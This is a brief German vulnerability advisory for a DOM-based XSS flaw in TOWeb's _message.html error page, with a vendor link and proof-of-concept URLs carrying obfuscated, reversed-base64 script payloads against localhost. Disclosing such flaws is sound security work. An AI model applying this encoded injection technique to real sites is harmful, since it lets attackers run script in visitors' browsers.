
(DOM-based XSS) HTML-Injection-Schwachstelle in TOWeb v.12.05 und früher ermöglicht es einem Angreifer, HTML/JS-Code über die _message.html-Komponente einzuschleusen.
siehe https://www.lauyan.com/en/toweb-updates.html#iyFEw37D
(DOM-basiertes XSS) HTML-Injection-Schwachstelle in TOWeb Version 5 <= 12.05 ermöglicht es einem Angreifer, HTML/JS-Code über die _message.html-Komponente einzuschleusen.
_message.html wird verwendet, um eine Fehlerseite anzuzeigen, indem der Code rechts vom ? dekodiert und ausgeführt wird.127.0.0.1:8000/_message.html?==gP2lGZvwjP2lGZvwjPyJGP+InY84DcvwDZuV3bGBCdv5EIldWYQ5Dc84jMo9CPg4jMoxjPiEmchBXL3RnI9M3chx2YgYXakxjPxg2L8IXdlJncF5TMoxjPiIXZ05WZjpjbnlGbh1Cd4VGdi0TZslHdzBidpRGP)python3 poc.py; python3 -m http.server -d src -> z. B. http://127.0.0.1:8000/_message.html?==gC+QHcpJ3Yz9CPpcyUThFIkV2chJWLN9ERngCdyVGbh5DdwlmcjNHP